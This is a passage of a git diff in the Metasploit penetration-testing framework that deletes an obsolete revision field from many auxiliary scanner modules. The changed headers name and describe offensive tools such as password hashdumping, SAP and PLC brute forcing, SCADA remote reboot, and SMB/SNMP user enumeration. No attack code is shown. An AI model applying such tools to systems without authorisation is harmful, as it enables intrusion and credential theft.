b/modules/auxiliary/scanner/portscan/ftpbounce.rb index 139685e883..a47a8eb7d1 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Bounce Port Scanner', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index e21ad6bda8..532e57e21f 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TCP Port Scanner', - 'Version' => '$Revision$', 'Description' => 'Enumerate open TCP services', 'Author' => [ 'hdm', 'kris katterjohn' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index cdf22d5ab2..711b782af4 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index 77cbc9a98b..21b0c7e61c 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres Schema Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the schema information from a Postgres server. diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 8c16e2bda5..93b24e9c84 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.metasploit.com/research/projects/rogue_network/'], diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 0fbec33a06..3e3a54308b 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.metasploit.com/research/projects/rogue_network/'], diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index eb360056b7..e4d2aa496b 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rexec Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test an rexec service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 8f9d251d95..7dfdb9585b 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rlogin Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test an rlogin service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index cf436adf64..9840d58e36 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rsh Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test a shell (rsh) service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 95e16a8620..791392766b 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user. }, - 'Version' => '$Revision$', 'Author' => [ 'Chris John Riley' ], 'References' => [ diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index b383085ff3..a3af96e649 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console ABAP syslog', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. }, 'References' => [ diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 95ade54c67..42fc8fa45b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -17,7 +17,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Brute Force', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to brute force the username | password for the SAP Management Console SOAP Interface. By diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index 528b72fe5d..c653986490 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Extract Users', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index dc9f17efa2..5590d96d0f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Access Points', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a list of SAP access points through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 6b0720b4ad..269bd94a27 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console getEnvironment', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify SAP Environment settings through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index 4be9c8d3a3..2ef53e8aa4 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Logfile', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index 918aa4662c..d59c371a8d 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Process Parameters', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a SAP process parameters and configuration settings through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index 188671bd1a..af99ca752b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Instance Properties', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify the instance properties through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index 3e4000cf8a..8a9d437fe5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console List Logfiles', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a list of available logfiles and developer tracefiles through the SAP Management diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index ca728e5d58..b33efab603 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console getStartProfile', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to acces the SAP startup profile through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 7d49a1f2ef..775034b114 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Version Detection', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface. diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index ecc28f56cb..41bead609f 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Digi ADDP Remote Reboot Initiator', - 'Version' => '$Revision$', 'Description' => 'Reboot Digi International based equipment through the ADDP service', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index ccb4b41e84..07944f3b46 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Digi ADDP Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover host information through the Digi International ADDP service', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index 1cda561fe9..7a990a3411 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Koyo DirectLogic PLC Password Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate to a locked Koyo DirectLogic PLC. The PLC uses a restrictive passcode, which can be A0000000 through A9999999. diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index e8b5d59c15..9c472c374e 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Username Enumerator (UDP)', - 'Version' => '$Revision$', 'Description' => 'Scan for numeric username/extensions using OPTIONS/REGISTER requests', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 03a059cb32..ef5a6d53b9 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Username Enumerator (TCP)', - 'Version' => '$Revision$', 'Description' => 'Scan for numeric username/extensions using OPTIONS/REGISTER requests', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 8e68b6a76a..a81df328b2 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Endpoint Scanner (UDP)', - 'Version' => '$Revision$', 'Description' => 'Scan for SIP devices using OPTIONS requests', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index db61db983a..07765fe8fa 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Endpoint Scanner (TCP)', - 'Version' => '$Revision$', 'Description' => 'Scan for SIP devices using OPTIONS requests', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index 14708519fd..35578201a7 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary (other versions may be affected). }, 'Author' => 'Anibal Aguiar ', - 'Version' => '$Revision$', 'References' => [ ['BID', '47710'], diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index c0684be2fd..560acd4cbc 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Session Pipe Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what named pipes are accessible over SMB', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index eca44759ff..cdb1b4f495 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Session Pipe DCERPC Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what DCERPC services are accessible over a SMB pipe', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 510e442288..b3138b8d75 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB 2.0 Protocol Detection', - 'Version' => '$Revision$', 'Description' => 'Detect systems that support the SMB 2.0 protocol', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index 3cce70f1df..1e29ff153e 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Share Enumeration', - 'Version' => '$Revision$', 'Description' => 'Determine what shares are provided by the SMB service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index a10619d1b7..f63fe57a1f 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB User Enumeration (SAM EnumUsers)', - 'Version' => '$Revision$', 'Description' => 'Determine what local users exist via the SAM RPC service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index 01c648ec2d..dc6124a9c1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision $', 'Description' => 'Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.', 'Author' => 'natron', - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx' ] diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 8b8d02c3dc..8ffe83a4bb 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Version' => '$Revision$', 'Description' => 'Determine what local users exist via brute force SID lookups', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index ac7409a9a8..13bf28c281 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Version Detection', - 'Version' => '$Revision$', 'Description' => 'Display version information about each system', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 04ba404bed..f8ca9137e9 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP User Enumeration Utility', - 'Version' => '$Revision$', 'Description' => %q{ The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index e7375990ac..70f5a7cde9 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'SMTP Banner Grabber', 'References' => [ diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 834c122836..8319b87a01 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'AIX SNMP Scanner Auxiliary Module', - 'Version' => '$Revision$', 'Description' => 'AIX SNMP Scanner Auxiliary Module', 'Author' => [ diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 1860c435e0..b565f7b995 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco IOS SNMP Configuration Grabber (TFTP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will download the startup or running configuration from a Cisco IOS device using SNMP and TFTP. A read-write SNMP diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index 139752a7ae..c9bb1716bf 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco IOS SNMP File Upload (TFTP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will copy file to a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 9d00bf3765..7db3f6190d 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'SNMP Enumeration Module', - 'Version' => '$Revision$', 'Description' => 'This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public".', diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 948914ea89..1fe6a610e8 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Windows SMB Share Enumeration', - 'Version' => '$Revision$', 'Description' => "This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP", 'Author' => ['tebo[at]attackresearch.com'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 771cabd62d..1d1c38fa14 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Windows Username Enumeration', - 'Version' => '$Revision$', 'Description' => "This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP", 'Author' => ['tebo[at]attackresearch.com'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index a6ee3ddbd8..84cbc9f4c0 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SNMP Community Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for SNMP devices using common community names', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index 5a35524018..668e0264cf 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'SNMP Set Module', - 'Version' => '$Revision$', 'Description' => %q{ This module, similar to snmpset tool, uses the SNMP SET request to set information on a network entity. A OID (numeric notation) diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index 8d09d40402..d2c1eb71af 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Xerox WorkCentre User Enumeration (SNMP)', - 'Version' => '$Revision$', 'Description' => %q{ This module will do user enumeration based on the Xerox WorkCentre present on the network. SNMP is used to extract the usernames. diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index e07b779710..b65aeeb166 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Login Check Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 649561e716..14a4c1ef97 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Public Key Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 57d8fa18fb..4a5edaeed9 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect SSH Version.', 'References' => [ diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index e7de815817..ebff3dbf6d 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -44,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Wardialer', - 'Version' => '$Revision$', 'Description' => 'Scan for dial-up systems that are connected to modems and answer telephony indials.', 'Author' => [ 'I)ruid' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index 5063999c45..91d330692a 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lantronix Telnet Service Banner Detection', - 'Version' => '$Revision$', 'Description' => 'Detect Lantronix telnet services', 'Author' => ['theLightCosine', 'hdm'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index c5884fc5c0..1495624749 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Service Encyption Key ID Overflow Detection', - 'Version' => '$Revision$', 'Description' => 'Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)', 'Author' => [ 'Jaime Penalba Estebanez ', 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index d2f7fbb532..0d513e9654 100644 --- 